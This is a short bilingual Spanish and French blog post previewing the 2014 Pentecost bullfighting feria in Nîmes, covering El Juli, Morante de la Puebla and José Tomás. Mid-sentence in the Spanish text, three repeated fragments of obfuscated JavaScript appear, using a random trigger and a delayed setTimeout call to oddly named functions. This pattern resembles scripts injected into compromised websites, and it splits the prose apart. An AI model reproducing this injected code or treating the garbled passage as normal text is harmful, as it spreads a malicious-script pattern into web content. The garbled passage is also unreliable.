ARQUITECTURA NIMEÑA 2014ARCHITECTURE NIMOISE 2014

Noventa días nos separan de la feria de Pentecostés en Nîmes. Para saberlo todo sobre los carteles habrá que esperar todavía unas semanas. Sin embargo ya conocemos algunos datos sobre su programación. La feria echará a andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andar el miércoles 4 de junio y no será ni una novillada ni una corrida de toros sino una corrida camarguesa, hecho que no se producía desde 1985 un domingo de Pentecostés.Otra certeza es la presencia de El Juli en la corrida de Miura. Falta por saber la fecha, probablemente el lunes por la tarde, y se conocerán pronto sus compañeros de cartel. El Juli tendrá probablemente una segunda comparecencia para la alternativa del franco español Román.

Se sabe casi con certeza que no Morante de la Puebla no estará en esta feria pero sí en la de la Vendimia. Queda por cerrarse o no la presencia de José Tomás que no ha vuelto a torear en público desde su encerrona histórica del 16 de septiembre del 2012. Los rumores lo anuncian aquí y allá, pero él sigue mudo.

 

Quatre vingt dix jours nous séparent de la feria de Pentecôte à Nîmes. Pour tout savoir sur les cartels, il faut attendre encore quelques semaines. Néanmoins, on connaît déjà quelques éléments de programmation.
Ainsi, la feria commencera le mercredi 4 juin avec à l'affiche, non pas une corrida ou une novillada, mais avec une course camarguaise qui fait son retour dans la feria ce qui ne s'était plus produit depuis 1985, année où elle fut programmée le dimanche de Pentecôte.
Autre certitude : la présence d'El Juli à la corrida de Miura. Reste à connaître le jour (probablement le lundi en clôture). Reste à connaître aussi les noms de ses compagnons de cartel. El Juli devrait bénéficier d'un deuxième contrat à la Pentecôte où il devrait donner l'alternative au jeune torero franco-espagnol : Roman.
Autre quasi-certitude : l'absence de Morante de la Puebla. Il sera là aux Vendanges. Probablement pas à la Pentecôte.
Enfin, reste le cas José Tomàs qui n'a plus torée en public depuis son historique solo du 16 septembre 2012.La rumeur l'annonce parci et par là. Mais, l'intéressé reste muet comme une carpe.

Les commentaires sont fermés.